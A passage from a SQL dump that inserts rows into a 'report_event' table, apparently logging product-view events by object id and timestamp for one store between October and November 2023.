(7331, '2023-10-19 04:31:30', 1, 2063, 1245, 1, 1),
(7332, '2023-10-19 04:31:31', 1, 2058, 1245, 1, 1),
(7333, '2023-10-19 04:31:32', 1, 2063, 1245, 1, 1),
(7334, '2023-10-19 04:31:34', 1, 2063, 1245, 1, 1),
(7335, '2023-10-19 04:31:35', 1, 2058, 1245, 1, 1),
(7336, '2023-10-19 04:31:36', 1, 2063, 1245, 1, 1),
(7337, '2023-10-19 04:31:38', 1, 2058, 1245, 1, 1),
(7338, '2023-10-19 04:31:39', 1, 2058, 1245, 1, 1),
(7339, '2023-10-19 04:31:42', 1, 2062, 1245, 1, 1),
(7340, '2023-10-19 04:31:43', 1, 2058, 1245, 1, 1),
(7341, '2023-10-19 04:31:45', 1, 2058, 1245, 1, 1),
(7342, '2023-10-19 04:31:48', 1, 2058, 1245, 1, 1),
(7343, '2023-10-19 04:32:15', 1, 2061, 1245, 1, 1),
(7344, '2023-10-19 04:32:54', 1, 2054, 1245, 1, 1),
(7345, '2023-10-19 04:33:13', 1, 2060, 1245, 1, 1),
(7346, '2023-10-19 04:33:56', 1, 2059, 1245, 1, 1),
(7347, '2023-10-19 04:33:59', 1, 2059, 1245, 1, 1),
(7348, '2023-10-19 04:34:00', 1, 2059, 1245, 1, 1),
(7349, '2023-10-19 04:34:02', 1, 2059, 1245, 1, 1),
(7350, '2023-10-19 04:34:04', 1, 2059, 1245, 1, 1),
(7351, '2023-10-19 04:34:04', 1, 2059, 1245, 1, 1),
(7352, '2023-10-19 04:34:06', 1, 2059, 1245, 1, 1),
(7353, '2023-10-19 04:34:08', 1, 2059, 1245, 1, 1),
(7354, '2023-10-19 04:34:09', 1, 2059, 1245, 1, 1),
(7355, '2023-10-19 04:34:11', 1, 2059, 1245, 1, 1),
(7356, '2023-10-19 04:34:12', 1, 2059, 1245, 1, 1),
(7357, '2023-10-19 04:34:14', 1, 2059, 1245, 1, 1),
(7358, '2023-10-19 04:34:17', 1, 2059, 1245, 1, 1),
(7359, '2023-10-19 04:34:21', 1, 2059, 1245, 1, 1),
(7360, '2023-10-19 04:34:23', 1, 2059, 1245, 1, 1),
(7361, '2023-10-19 04:34:28', 1, 2059, 1245, 1, 1),
(7362, '2023-10-19 04:34:31', 1, 2059, 1245, 1, 1),
(7363, '2023-10-19 04:34:33', 1, 2059, 1245, 1, 1),
(7364, '2023-10-19 04:34:35', 1, 2059, 1245, 1, 1),
(7365, '2023-10-19 04:35:15', 1, 2058, 1245, 1, 1),
(7366, '2023-10-19 04:35:17', 1, 2058, 1245, 1, 1),
(7367, '2023-10-19 04:35:18', 1, 2058, 1245, 1, 1),
(7368, '2023-10-19 04:35:19', 1, 2058, 1245, 1, 1),
(7369, '2023-10-19 04:35:20', 1, 2058, 1245, 1, 1),
(7370, '2023-10-19 04:35:21', 1, 2058, 1245, 1, 1),
(7371, '2023-10-19 04:35:22', 1, 2058, 1245, 1, 1),
(7372, '2023-10-19 04:35:23', 1, 2058, 1245, 1, 1),
(7373, '2023-10-19 04:35:24', 1, 2058, 1245, 1, 1),
(7374, '2023-10-19 04:35:25', 1, 2058, 1245, 1, 1),
(7375, '2023-10-19 04:35:27', 1, 2058, 1245, 1, 1),
(7376, '2023-10-19 04:35:29', 1, 2058, 1245, 1, 1),
(7377, '2023-10-19 04:35:31', 1, 2058, 1245, 1, 1),
(7378, '2023-10-19 04:35:34', 1, 2058, 1245, 1, 1),
(7379, '2023-10-19 04:35:35', 1, 2058, 1245, 1, 1),
(7380, '2023-10-19 04:35:36', 1, 2058, 1245, 1, 1),
(7381, '2023-10-19 04:35:38', 1, 2058, 1245, 1, 1),
(7382, '2023-10-19 04:35:40', 1, 2058, 1245, 1, 1),
(7383, '2023-10-19 04:35:42', 1, 2058, 1245, 1, 1),
(7384, '2023-10-19 04:36:35', 1, 2055, 1245, 1, 1),
(7385, '2023-10-19 04:36:37', 1, 2055, 1245, 1, 1),
(7386, '2023-10-19 04:36:41', 1, 2055, 1245, 1, 1),
(7387, '2023-10-19 04:36:42', 1, 2055, 1245, 1, 1),
(7388, '2023-10-19 04:36:45', 1, 2055, 1245, 1, 1),
(7389, '2023-10-19 04:36:47', 1, 2055, 1245, 1, 1),
(7390, '2023-10-19 04:36:49', 1, 2055, 1245, 1, 1),
(7391, '2023-10-19 04:36:51', 1, 2055, 1245, 1, 1),
(7392, '2023-10-19 04:36:54', 1, 2055, 1245, 1, 1),
(7393, '2023-10-19 04:36:57', 1, 2055, 1245, 1, 1),
(7394, '2023-10-19 04:36:58', 1, 2054, 1245, 1, 1),
(7395, '2023-10-19 04:37:00', 1, 2055, 1245, 1, 1),
(7396, '2023-10-19 04:37:03', 1, 2054, 1245, 1, 1),
(7397, '2023-10-19 04:37:05', 1, 2054, 1245, 1, 1),
(7398, '2023-10-19 04:37:06', 1, 2055, 1245, 1, 1),
(7399, '2023-10-19 04:37:10', 1, 2054, 1245, 1, 1),
(7400, '2023-10-19 04:37:11', 1, 2054, 1245, 1, 1),
(7401, '2023-10-19 04:37:12', 1, 2064, 1245, 1, 1),
(7402, '2023-10-19 04:37:13', 1, 2055, 1245, 1, 1),
(7403, '2023-10-19 04:37:14', 1, 2063, 1245, 1, 1),
(7404, '2023-10-19 04:37:15', 1, 2055, 1245, 1, 1),
(7405, '2023-10-19 04:37:16', 1, 2062, 1245, 1, 1),
(7406, '2023-10-19 04:37:19', 1, 2055, 1245, 1, 1),
(7407, '2023-10-19 04:37:20', 1, 2060, 1245, 1, 1),
(7408, '2023-10-19 04:37:20', 1, 2054, 1245, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(7409, '2023-10-19 04:37:21', 1, 2064, 1245, 1, 1),
(7410, '2023-10-19 04:37:21', 1, 2054, 1245, 1, 1),
(7411, '2023-10-19 04:37:23', 1, 2064, 1245, 1, 1),
(7412, '2023-10-19 04:37:24', 1, 2063, 1245, 1, 1),
(7413, '2023-10-19 04:37:25', 1, 2054, 1245, 1, 1),
(7414, '2023-10-19 04:37:26', 1, 2064, 1245, 1, 1),
(7415, '2023-10-19 04:37:26', 1, 2055, 1245, 1, 1),
(7416, '2023-10-19 04:37:27', 1, 2063, 1245, 1, 1),
(7417, '2023-10-19 04:37:27', 1, 2054, 1245, 1, 1),
(7418, '2023-10-19 04:37:28', 1, 2053, 1245, 1, 1),
(7419, '2023-10-19 04:37:28', 1, 2054, 1245, 1, 1),
(7420, '2023-10-19 04:37:30', 1, 2055, 1245, 1, 1),
(7421, '2023-10-19 04:37:30', 1, 2055, 1245, 1, 1),
(7422, '2023-10-19 04:37:32', 1, 2062, 1245, 1, 1),
(7423, '2023-10-19 04:37:32', 1, 2054, 1245, 1, 1),
(7424, '2023-10-19 04:37:33', 1, 2055, 1245, 1, 1),
(7425, '2023-10-19 04:37:34', 1, 2054, 1245, 1, 1),
(7426, '2023-10-19 04:37:34', 1, 2055, 1245, 1, 1),
(7427, '2023-10-19 04:37:35', 1, 2055, 1245, 1, 1),
(7428, '2023-10-19 04:37:35', 1, 2062, 1245, 1, 1),
(7429, '2023-10-19 04:37:36', 1, 2063, 1245, 1, 1),
(7430, '2023-10-19 04:37:36', 1, 2055, 1245, 1, 1),
(7431, '2023-10-19 04:37:37', 1, 2054, 1245, 1, 1),
(7432, '2023-10-19 04:37:39', 1, 2055, 1245, 1, 1),
(7433, '2023-10-19 04:37:41', 1, 2054, 1245, 1, 1),
(7434, '2023-10-19 04:37:42', 1, 2060, 1245, 1, 1),
(7435, '2023-10-19 04:37:43', 1, 2060, 1245, 1, 1),
(7436, '2023-10-19 04:37:44', 1, 2054, 1245, 1, 1),
(7437, '2023-10-19 04:37:44', 1, 2060, 1245, 1, 1),
(7438, '2023-10-19 04:37:45', 1, 2062, 1245, 1, 1),
(7439, '2023-10-19 04:37:46', 1, 2064, 1245, 1, 1),
(7440, '2023-10-19 04:37:47', 1, 2054, 1245, 1, 1),
(7441, '2023-10-19 04:37:47', 1, 2063, 1245, 1, 1),
(7442, '2023-10-19 04:37:50', 1, 2063, 1245, 1, 1),
(7443, '2023-10-19 04:37:50', 1, 2054, 1245, 1, 1),
(7444, '2023-10-19 04:37:51', 1, 2064, 1245, 1, 1),
(7445, '2023-10-19 04:37:53', 1, 2055, 1245, 1, 1),
(7446, '2023-10-19 04:37:53', 1, 2054, 1245, 1, 1),
(7447, '2023-10-19 04:37:54', 1, 2062, 1245, 1, 1),
(7448, '2023-10-19 04:37:55', 1, 2055, 1245, 1, 1),
(7449, '2023-10-19 04:37:56', 1, 2064, 1245, 1, 1),
(7450, '2023-10-19 04:37:58', 1, 2054, 1245, 1, 1),
(7451, '2023-10-19 04:37:58', 1, 2055, 1245, 1, 1),
(7452, '2023-10-19 04:38:00', 1, 2062, 1245, 1, 1),
(7453, '2023-10-19 04:38:01', 1, 2053, 1245, 1, 1),
(7454, '2023-10-19 04:38:02', 1, 2053, 1245, 1, 1),
(7455, '2023-10-19 04:38:06', 1, 2053, 1245, 1, 1),
(7456, '2023-10-19 04:38:08', 1, 2060, 1245, 1, 1),
(7457, '2023-10-19 04:38:09', 1, 2060, 1245, 1, 1),
(7458, '2023-10-19 04:38:12', 1, 2055, 1245, 1, 1),
(7459, '2023-10-19 04:38:15', 1, 2062, 1245, 1, 1),
(7460, '2023-10-19 04:46:17', 1, 2059, 0, 1, 1),
(7461, '2023-10-19 07:11:22', 1, 2064, 0, 1, 1),
(7462, '2023-10-19 07:11:22', 1, 2064, 0, 1, 1),
(7463, '2023-10-19 10:04:40', 1, 2059, 0, 1, 1),
(7464, '2023-10-19 15:49:02', 1, 2053, 0, 1, 1),
(7465, '2023-10-19 16:56:06', 1, 2064, 0, 1, 1),
(7466, '2023-10-19 20:56:11', 1, 2064, 0, 1, 1),
(7467, '2023-10-19 20:56:14', 1, 2064, 0, 1, 1),
(7468, '2023-10-20 07:15:35', 1, 2059, 0, 1, 1),
(7469, '2023-10-20 12:21:14', 1, 2058, 0, 1, 1),
(7470, '2023-10-20 12:46:55', 1, 2053, 0, 1, 1),
(7471, '2023-10-20 15:29:41', 1, 2061, 0, 1, 1),
(7472, '2023-10-20 15:32:34', 1, 2064, 0, 1, 1),
(7473, '2023-10-20 15:37:53', 1, 2063, 0, 1, 1),
(7474, '2023-10-20 15:41:59', 1, 2058, 0, 1, 1),
(7475, '2023-10-20 16:06:37', 1, 2063, 0, 1, 1),
(7476, '2023-10-20 16:31:24', 1, 2061, 0, 1, 1),
(7477, '2023-10-20 17:02:34', 1, 2064, 0, 1, 1),
(7478, '2023-10-20 17:36:58', 1, 2058, 0, 1, 1),
(7479, '2023-10-20 19:23:25', 1, 2063, 0, 1, 1),
(7480, '2023-10-20 19:33:49', 1, 2064, 0, 1, 1),
(7481, '2023-10-20 20:51:20', 1, 2059, 0, 1, 1),
(7482, '2023-10-20 21:12:26', 1, 2064, 0, 1, 1),
(7483, '2023-10-20 21:59:18', 1, 2062, 0, 1, 1),
(7484, '2023-10-20 23:58:44', 1, 2055, 0, 1, 1),
(7485, '2023-10-21 01:15:35', 1, 2062, 0, 1, 1),
(7486, '2023-10-21 02:32:51', 1, 2060, 0, 1, 1),
(7487, '2023-10-21 07:03:22', 1, 2064, 0, 1, 1),
(7488, '2023-10-21 07:05:34', 1, 2061, 0, 1, 1),
(7489, '2023-10-21 07:16:50', 1, 2054, 0, 1, 1),
(7490, '2023-10-21 09:43:42', 1, 2064, 0, 1, 1),
(7491, '2023-10-21 10:22:05', 1, 2064, 0, 1, 1),
(7492, '2023-10-21 22:20:06', 1, 2061, 0, 1, 1),
(7493, '2023-10-22 00:02:48', 1, 2063, 0, 1, 1),
(7494, '2023-10-22 03:02:51', 1, 2061, 0, 1, 1),
(7495, '2023-10-22 03:36:49', 1, 2059, 0, 1, 1),
(7496, '2023-10-22 06:40:52', 1, 2064, 0, 1, 1),
(7497, '2023-10-22 06:47:48', 1, 2059, 0, 1, 1),
(7498, '2023-10-22 07:18:08', 1, 2061, 0, 1, 1),
(7499, '2023-10-22 07:18:37', 1, 2059, 0, 1, 1),
(7500, '2023-10-22 13:35:13', 1, 2059, 0, 1, 1),
(7501, '2023-10-22 14:52:37', 1, 2063, 0, 1, 1),
(7502, '2023-10-22 19:14:19', 1, 2060, 0, 1, 1),
(7503, '2023-10-22 19:24:32', 1, 2063, 0, 1, 1),
(7504, '2023-10-22 19:48:48', 1, 2058, 0, 1, 1),
(7505, '2023-10-22 20:32:01', 1, 2055, 0, 1, 1),
(7506, '2023-10-22 21:34:30', 1, 2060, 0, 1, 1),
(7507, '2023-10-22 21:49:15', 1, 2063, 0, 1, 1),
(7508, '2023-10-22 21:51:11', 1, 2062, 0, 1, 1),
(7509, '2023-10-22 22:06:49', 1, 2058, 0, 1, 1),
(7510, '2023-10-22 22:47:37', 1, 2055, 0, 1, 1),
(7511, '2023-10-22 23:52:34', 1, 2061, 0, 1, 1),
(7512, '2023-10-23 00:35:13', 1, 2060, 0, 1, 1),
(7513, '2023-10-23 00:45:15', 1, 2063, 0, 1, 1),
(7514, '2023-10-23 01:09:49', 1, 2058, 0, 1, 1),
(7515, '2023-10-23 02:07:05', 1, 2060, 0, 1, 1),
(7516, '2023-10-23 02:16:40', 1, 2063, 0, 1, 1),
(7517, '2023-10-23 02:39:49', 1, 2058, 0, 1, 1),
(7518, '2023-10-23 03:26:33', 1, 2055, 0, 1, 1),
(7519, '2023-10-23 04:42:40', 1, 2061, 0, 1, 1),
(7520, '2023-10-23 05:28:10', 1, 2062, 0, 1, 1),
(7521, '2023-10-23 05:30:24', 1, 2060, 0, 1, 1),
(7522, '2023-10-23 05:30:32', 1, 2063, 0, 1, 1),
(7523, '2023-10-23 05:30:46', 1, 2058, 0, 1, 1),
(7524, '2023-10-23 05:30:58', 1, 2055, 0, 1, 1),
(7525, '2023-10-23 05:31:30', 1, 2061, 0, 1, 1),
(7526, '2023-10-23 05:31:38', 1, 2062, 0, 1, 1),
(7527, '2023-10-23 05:31:57', 1, 2054, 0, 1, 1),
(7528, '2023-10-23 05:32:03', 1, 2059, 0, 1, 1),
(7529, '2023-10-23 05:32:07', 1, 2064, 0, 1, 1),
(7530, '2023-10-23 06:38:11', 1, 2060, 0, 1, 1),
(7531, '2023-10-23 06:40:41', 1, 2054, 0, 1, 1),
(7532, '2023-10-23 06:40:41', 1, 2054, 0, 1, 1),
(7533, '2023-10-23 06:40:43', 1, 2054, 0, 1, 1),
(7534, '2023-10-23 06:48:18', 1, 2063, 0, 1, 1),
(7535, '2023-10-23 07:07:42', 1, 2061, 0, 1, 1),
(7536, '2023-10-23 07:11:59', 1, 2058, 0, 1, 1),
(7537, '2023-10-23 07:53:38', 1, 2055, 0, 1, 1),
(7538, '2023-10-23 09:01:25', 1, 2061, 0, 1, 1),
(7539, '2023-10-23 09:46:40', 1, 2062, 0, 1, 1),
(7540, '2023-10-23 11:19:19', 1, 2054, 0, 1, 1),
(7541, '2023-10-23 11:20:01', 1, 2059, 0, 1, 1),
(7542, '2023-10-23 11:38:25', 1, 2059, 0, 1, 1),
(7543, '2023-10-23 11:54:30', 1, 2064, 0, 1, 1),
(7544, '2023-10-23 20:13:48', 1, 2063, 0, 1, 1),
(7545, '2023-10-23 21:33:05', 1, 2060, 0, 1, 1),
(7546, '2023-10-23 21:42:53', 1, 2063, 0, 1, 1),
(7547, '2023-10-23 22:18:00', 1, 2060, 0, 1, 1),
(7548, '2023-10-23 22:27:17', 1, 2063, 0, 1, 1),
(7549, '2023-10-23 22:31:18', 1, 2063, 0, 1, 1),
(7550, '2023-10-23 22:50:37', 1, 2058, 0, 1, 1),
(7551, '2023-10-23 22:53:48', 1, 2063, 0, 1, 1),
(7552, '2023-10-23 23:33:18', 1, 2055, 0, 1, 1),
(7553, '2023-10-24 00:42:38', 1, 2060, 0, 1, 1),
(7554, '2023-10-24 00:54:46', 1, 2063, 0, 1, 1),
(7555, '2023-10-24 01:23:45', 1, 2058, 0, 1, 1),
(7556, '2023-10-24 02:17:56', 1, 2055, 0, 1, 1),
(7557, '2023-10-24 03:41:59', 1, 2061, 0, 1, 1),
(7558, '2023-10-24 04:34:00', 1, 2062, 0, 1, 1),
(7559, '2023-10-24 06:21:47', 1, 2054, 0, 1, 1),
(7560, '2023-10-24 06:32:44', 1, 2059, 0, 1, 1),
(7561, '2023-10-24 06:45:31', 1, 2059, 0, 1, 1),
(7562, '2023-10-24 07:05:28', 1, 2064, 0, 1, 1),
(7563, '2023-10-24 07:58:43', 1, 2063, 0, 1, 1),
(7564, '2023-10-24 07:58:49', 1, 2063, 0, 1, 1),
(7565, '2023-10-24 07:58:53', 1, 2063, 0, 1, 1),
(7566, '2023-10-24 11:00:35', 1, 2054, 0, 1, 1),
(7567, '2023-10-24 11:47:36', 1, 2054, 0, 1, 1),
(7568, '2023-10-24 16:36:39', 1, 2064, 0, 1, 1),
(7569, '2023-10-24 18:06:39', 1, 2063, 0, 1, 1),
(7570, '2023-10-24 18:18:40', 1, 2059, 0, 1, 1),
(7571, '2023-10-24 19:08:47', 1, 2055, 0, 1, 1),
(7572, '2023-10-24 19:08:48', 1, 2058, 0, 1, 1),
(7573, '2023-10-24 20:28:52', 1, 2058, 0, 1, 1),
(7574, '2023-10-25 00:38:17', 1, 2063, 0, 1, 1),
(7575, '2023-10-25 01:20:20', 1, 2063, 0, 1, 1),
(7576, '2023-10-25 03:44:10', 1, 2059, 0, 1, 1),
(7577, '2023-10-25 10:47:43', 1, 2053, 0, 1, 1),
(7578, '2023-10-26 09:15:49', 1, 2063, 0, 1, 1),
(7579, '2023-10-26 17:47:15', 1, 2059, 0, 1, 1),
(7580, '2023-10-26 22:50:47', 1, 2063, 0, 1, 1),
(7581, '2023-10-26 23:05:27', 1, 2063, 0, 1, 1),
(7582, '2023-10-27 02:07:34', 1, 2062, 0, 1, 1),
(7583, '2023-10-27 04:17:25', 1, 2064, 0, 1, 1),
(7584, '2023-10-27 14:19:18', 1, 2061, 0, 1, 1),
(7585, '2023-10-27 14:22:00', 1, 2061, 0, 1, 1),
(7586, '2023-10-27 14:51:00', 1, 2059, 0, 1, 1),
(7587, '2023-10-28 01:13:17', 1, 2061, 0, 1, 1),
(7588, '2023-10-28 03:21:21', 1, 2054, 0, 1, 1),
(7589, '2023-10-28 04:52:23', 1, 2059, 0, 1, 1),
(7590, '2023-10-28 17:04:06', 1, 2054, 0, 1, 1),
(7591, '2023-10-28 21:17:10', 1, 2059, 0, 1, 1),
(7592, '2023-10-29 03:03:14', 1, 2061, 0, 1, 1),
(7593, '2023-10-29 03:13:22', 1, 2055, 0, 1, 1),
(7594, '2023-10-29 04:22:11', 1, 2053, 0, 1, 1),
(7595, '2023-10-29 04:22:28', 1, 2063, 0, 1, 1),
(7596, '2023-10-29 04:22:31', 1, 2062, 0, 1, 1),
(7597, '2023-10-29 04:22:37', 1, 2060, 0, 1, 1),
(7598, '2023-10-29 04:22:40', 1, 2059, 0, 1, 1),
(7599, '2023-10-29 08:05:51', 1, 2059, 0, 1, 1),
(7600, '2023-10-29 09:26:21', 1, 2064, 0, 1, 1),
(7601, '2023-10-29 11:17:36', 1, 2061, 0, 1, 1),
(7602, '2023-10-29 12:53:54', 1, 2061, 0, 1, 1),
(7603, '2023-10-29 12:55:05', 1, 2061, 0, 1, 1),
(7604, '2023-10-29 13:51:43', 1, 2061, 0, 1, 1),
(7605, '2023-10-29 17:22:11', 1, 2060, 0, 1, 1),
(7606, '2023-10-29 17:39:55', 1, 2054, 0, 1, 1),
(7607, '2023-10-29 18:33:35', 1, 2064, 0, 1, 1),
(7608, '2023-10-29 18:38:57', 1, 2063, 0, 1, 1),
(7609, '2023-10-29 20:58:29', 1, 2054, 0, 1, 1),
(7610, '2023-10-29 23:53:15', 1, 2063, 0, 1, 1),
(7611, '2023-10-30 02:26:47', 1, 2064, 0, 1, 1),
(7612, '2023-10-30 02:40:36', 1, 2061, 0, 1, 1),
(7613, '2023-10-30 02:45:53', 1, 2059, 0, 1, 1),
(7614, '2023-10-30 03:12:17', 1, 2062, 0, 1, 1),
(7615, '2023-10-30 03:50:07', 1, 2055, 0, 1, 1),
(7616, '2023-10-30 03:51:38', 1, 2062, 0, 1, 1),
(7617, '2023-10-30 04:34:53', 1, 2058, 0, 1, 1),
(7618, '2023-10-30 12:13:54', 1, 2064, 0, 1, 1),
(7619, '2023-10-31 00:16:19', 1, 2055, 0, 1, 1),
(7620, '2023-10-31 02:52:31', 1, 2060, 0, 1, 1),
(7621, '2023-10-31 07:23:23', 1, 2061, 0, 1, 1),
(7622, '2023-10-31 08:08:22', 1, 2063, 0, 1, 1),
(7623, '2023-10-31 08:26:07', 1, 2061, 0, 1, 1),
(7624, '2023-10-31 08:44:22', 1, 2055, 0, 1, 1),
(7625, '2023-10-31 11:14:24', 1, 2063, 0, 1, 1),
(7626, '2023-10-31 11:14:59', 1, 2063, 0, 1, 1),
(7627, '2023-10-31 11:38:51', 1, 2061, 0, 1, 1),
(7628, '2023-10-31 12:56:23', 1, 2058, 0, 1, 1),
(7629, '2023-10-31 16:51:48', 1, 2062, 0, 1, 1),
(7630, '2023-10-31 16:51:49', 1, 2063, 0, 1, 1),
(7631, '2023-10-31 16:51:50', 1, 2063, 0, 1, 1),
(7632, '2023-10-31 22:26:31', 1, 2063, 0, 1, 1),
(7633, '2023-10-31 22:35:55', 1, 2061, 0, 1, 1),
(7634, '2023-11-01 03:39:48', 1, 2059, 0, 1, 1),
(7635, '2023-11-01 04:23:11', 1, 2061, 0, 1, 1),
(7636, '2023-11-01 04:31:29', 1, 2060, 0, 1, 1),
(7637, '2023-11-01 04:31:34', 1, 2060, 0, 1, 1),
(7638, '2023-11-01 09:10:44', 1, 2059, 0, 1, 1),
(7639, '2023-11-01 10:21:48', 1, 2060, 0, 1, 1),
(7640, '2023-11-01 11:52:31', 1, 2059, 0, 1, 1),
(7641, '2023-11-01 12:01:00', 1, 2061, 0, 1, 1),
(7642, '2023-11-01 12:03:27', 1, 2061, 0, 1, 1),
(7643, '2023-11-01 14:25:44', 1, 2054, 0, 1, 1),
(7644, '2023-11-01 21:06:47', 1, 2060, 0, 1, 1),
(7645, '2023-11-01 21:30:10', 1, 2061, 0, 1, 1),
(7646, '2023-11-01 21:44:27', 1, 2060, 0, 1, 1),
(7647, '2023-11-01 21:49:08', 1, 2063, 0, 1, 1),
(7648, '2023-11-01 22:12:30', 1, 2058, 0, 1, 1),
(7649, '2023-11-01 22:22:32', 1, 2055, 0, 1, 1),
(7650, '2023-11-01 22:23:25', 1, 2063, 0, 1, 1),
(7651, '2023-11-01 22:53:49', 1, 2055, 0, 1, 1),
(7652, '2023-11-01 23:30:10', 1, 2061, 0, 1, 1),
(7653, '2023-11-02 00:01:25', 1, 2061, 0, 1, 1),
(7654, '2023-11-02 00:58:04', 1, 2060, 0, 1, 1),
(7655, '2023-11-02 01:09:34', 1, 2063, 0, 1, 1),
(7656, '2023-11-02 01:36:32', 1, 2058, 0, 1, 1),
(7657, '2023-11-02 01:46:58', 1, 2055, 0, 1, 1),
(7658, '2023-11-02 02:24:59', 1, 2055, 0, 1, 1),
(7659, '2023-11-02 03:48:22', 1, 2061, 0, 1, 1),
(7660, '2023-11-02 04:30:48', 1, 2062, 0, 1, 1),
(7661, '2023-11-02 05:44:01', 1, 2060, 0, 1, 1),
(7662, '2023-11-02 05:53:46', 1, 2063, 0, 1, 1),
(7663, '2023-11-02 06:16:19', 1, 2058, 0, 1, 1),
(7664, '2023-11-02 06:52:33', 1, 2061, 0, 1, 1),
(7665, '2023-11-02 06:56:48', 1, 2055, 0, 1, 1),
(7666, '2023-11-02 07:26:59', 1, 2054, 0, 1, 1),
(7667, '2023-11-02 07:52:32', 1, 2061, 0, 1, 1),
(7668, '2023-11-02 08:08:43', 1, 2061, 0, 1, 1),
(7669, '2023-11-02 08:48:18', 1, 2062, 0, 1, 1),
(7670, '2023-11-02 08:52:03', 1, 2064, 0, 1, 1),
(7671, '2023-11-02 10:04:13', 1, 2054, 0, 1, 1),
(7672, '2023-11-02 10:21:58', 1, 2059, 0, 1, 1),
(7673, '2023-11-02 10:36:06', 1, 2064, 0, 1, 1),
(7674, '2023-11-02 16:22:38', 1, 2054, 0, 1, 1),
(7675, '2023-11-02 17:07:37', 1, 2059, 0, 1, 1),
(7676, '2023-11-02 20:56:12', 1, 2060, 0, 1, 1),
(7677, '2023-11-02 21:06:04', 1, 2063, 0, 1, 1),
(7678, '2023-11-02 21:47:29', 1, 2060, 0, 1, 1),
(7679, '2023-11-02 21:59:02', 1, 2063, 0, 1, 1),
(7680, '2023-11-02 22:27:11', 1, 2058, 0, 1, 1),
(7681, '2023-11-02 23:13:50', 1, 2055, 0, 1, 1),
(7682, '2023-11-03 00:19:08', 1, 2061, 0, 1, 1),
(7683, '2023-11-03 00:57:35', 1, 2062, 0, 1, 1),
(7684, '2023-11-03 02:12:07', 1, 2054, 0, 1, 1),
(7685, '2023-11-03 02:28:44', 1, 2059, 0, 1, 1),
(7686, '2023-11-03 02:42:57', 1, 2064, 0, 1, 1),
(7687, '2023-11-03 03:16:59', 1, 2062, 0, 1, 1),
(7688, '2023-11-03 04:12:05', 1, 2054, 0, 1, 1),
(7689, '2023-11-03 04:53:03', 1, 2062, 0, 1, 1),
(7690, '2023-11-03 05:09:01', 1, 2060, 0, 1, 1),
(7691, '2023-11-03 07:52:19', 1, 2054, 0, 1, 1),
(7692, '2023-11-03 08:30:35', 1, 2053, 0, 1, 1),
(7693, '2023-11-03 09:45:44', 1, 2064, 0, 1, 1),
(7694, '2023-11-03 13:21:05', 1, 2064, 0, 1, 1),
(7695, '2023-11-03 13:33:52', 1, 2063, 0, 1, 1),
(7696, '2023-11-03 15:21:34', 1, 2059, 0, 1, 1),
(7697, '2023-11-03 16:36:15', 1, 2062, 0, 1, 1),
(7698, '2023-11-03 18:24:47', 1, 2060, 0, 1, 1),
(7699, '2023-11-03 18:38:40', 1, 2058, 0, 1, 1),
(7700, '2023-11-03 19:01:09', 1, 2058, 0, 1, 1),
(7701, '2023-11-03 19:14:21', 1, 2064, 0, 1, 1),
(7702, '2023-11-03 19:54:23', 1, 2055, 0, 1, 1),
(7703, '2023-11-03 20:29:44', 1, 2054, 0, 1, 1),
(7704, '2023-11-03 22:43:53', 1, 2061, 0, 1, 1),
(7705, '2023-11-04 03:24:18', 1, 2055, 0, 1, 1),
(7706, '2023-11-04 05:18:09', 1, 2063, 0, 1, 1),
(7707, '2023-11-04 06:07:11', 1, 2062, 0, 1, 1),
(7708, '2023-11-04 07:10:29', 1, 2062, 0, 1, 1),
(7709, '2023-11-04 14:53:53', 1, 2064, 0, 1, 1),
(7710, '2023-11-04 18:07:02', 1, 2061, 0, 1, 1),
(7711, '2023-11-04 18:33:48', 1, 2059, 0, 1, 1),
(7712, '2023-11-04 18:53:37', 1, 2061, 0, 1, 1),
(7713, '2023-11-04 19:46:38', 1, 2061, 0, 1, 1),
(7714, '2023-11-04 20:09:17', 1, 2061, 0, 1, 1),
(7715, '2023-11-04 23:04:50', 1, 2061, 0, 1, 1),
(7716, '2023-11-04 23:32:47', 1, 2061, 0, 1, 1),
(7717, '2023-11-05 01:00:19', 1, 2061, 0, 1, 1),
(7718, '2023-11-05 02:22:07', 1, 2061, 0, 1, 1),
(7719, '2023-11-05 02:45:26', 1, 2061, 0, 1, 1),
(7720, '2023-11-05 02:45:49', 1, 2061, 0, 1, 1),
(7721, '2023-11-05 03:10:50', 1, 2059, 0, 1, 1),
(7722, '2023-11-05 03:36:38', 1, 2060, 0, 1, 1),
(7723, '2023-11-05 03:36:39', 1, 2058, 0, 1, 1),
(7724, '2023-11-05 03:36:48', 1, 2054, 0, 1, 1),
(7725, '2023-11-05 03:36:49', 1, 2061, 0, 1, 1),
(7726, '2023-11-05 03:36:53', 1, 2064, 0, 1, 1),
(7727, '2023-11-05 03:36:54', 1, 2062, 0, 1, 1),
(7728, '2023-11-05 03:36:59', 1, 2063, 0, 1, 1),
(7729, '2023-11-05 03:37:00', 1, 2059, 0, 1, 1),
(7730, '2023-11-05 03:37:00', 1, 2055, 0, 1, 1),
(7731, '2023-11-05 04:55:11', 1, 2061, 0, 1, 1),
(7732, '2023-11-05 06:15:28', 1, 2055, 0, 1, 1),
(7733, '2023-11-05 06:36:55', 1, 2061, 0, 1, 1),
(7734, '2023-11-05 06:41:08', 1, 2061, 0, 1, 1),
(7735, '2023-11-05 07:09:22', 1, 2054, 0, 1, 1),
(7736, '2023-11-05 07:30:40', 1, 2058, 0, 1, 1),
(7737, '2023-11-05 07:30:48', 1, 2064, 0, 1, 1),
(7738, '2023-11-05 07:30:56', 1, 2062, 0, 1, 1),
(7739, '2023-11-05 07:30:57', 1, 2055, 0, 1, 1),
(7740, '2023-11-05 07:31:03', 1, 2059, 0, 1, 1),
(7741, '2023-11-05 07:31:05', 1, 2063, 0, 1, 1),
(7742, '2023-11-05 07:31:07', 1, 2061, 0, 1, 1),
(7743, '2023-11-05 07:31:09', 1, 2054, 0, 1, 1),
(7744, '2023-11-05 07:31:15', 1, 2060, 0, 1, 1),
(7745, '2023-11-05 07:31:47', 1, 2058, 0, 1, 1),
(7746, '2023-11-05 07:31:55', 1, 2064, 0, 1, 1),
(7747, '2023-11-05 07:32:04', 1, 2054, 0, 1, 1),
(7748, '2023-11-05 07:32:08', 1, 2062, 0, 1, 1),
(7749, '2023-11-05 07:32:10', 1, 2055, 0, 1, 1),
(7750, '2023-11-05 07:32:20', 1, 2059, 0, 1, 1),
(7751, '2023-11-05 07:32:21', 1, 2063, 0, 1, 1),
(7752, '2023-11-05 07:32:22', 1, 2061, 0, 1, 1),
(7753, '2023-11-05 07:32:28', 1, 2060, 0, 1, 1),
